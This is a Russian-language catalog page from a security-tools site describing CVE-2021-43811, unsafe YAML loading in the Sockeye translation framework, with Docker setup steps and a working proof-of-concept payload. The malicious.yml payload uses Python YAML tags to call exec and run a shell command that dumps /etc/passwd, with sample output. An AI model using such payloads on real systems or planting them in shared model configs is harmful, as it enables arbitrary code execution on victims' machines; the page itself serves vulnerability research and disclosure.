Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-43811 — awslabs/sockeye Внедрение кода через небезопасную загрузку YAML CVE-2021-43811 | Kitploit
Инструменты/GitHubGitHub/s-index/cve-2021-43811
Генерация полезной нагрузкиАнализ уязвимостейАнализ КодаЭксплуатацияСтатьи и ИсследованияОбучение и Образование
GitHubs-index/cve-2021-43811

CVE-2021-43811

awslabs/sockeye Внедрение кода через небезопасную загрузку YAML CVE-2021-43811

Репозиторий
22494 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-43811

awslabs/sockeye Внедрение кода через небезопасную загрузку YAML CVE-2021-43811

Описание NVD

Sockeye — это фреймворк с открытым исходным кодом для нейронного машинного перевода типа "последовательность-в-последовательность", построенный на PyTorch. Sockeye использует YAML для хранения конфигураций моделей и данных на диске. Версии ниже 2.3.24 используют небезопасную загрузку YAML, которая может быть использована для выполнения произвольного кода, встроенного в файлы конфигурации. Злоумышленник может добавить вредоносный код в файл конфигурации обученной модели и попытаться убедить пользователей скачать и запустить его. Если пользователи запускают модель, встроенный код выполняется локально. Проблема исправлена в версии 2.3.24.

Демонстрация

cve-2021-43811

Настройка

  1. Создайте образ из Dockerfile
root@kitploit:~
docker build -t cve-2021-43811 .
  1. Запустите python main.py в новом контейнере
root@kitploit:~
docker run -it --rm cve-2021-43811

вывод /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

PoC Пэйлоад

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

Ссылки

  • https://github.com/awslabs/sockeye/security/advisories/GHSA-ggmr-44cv-24pm
Скачать инструмент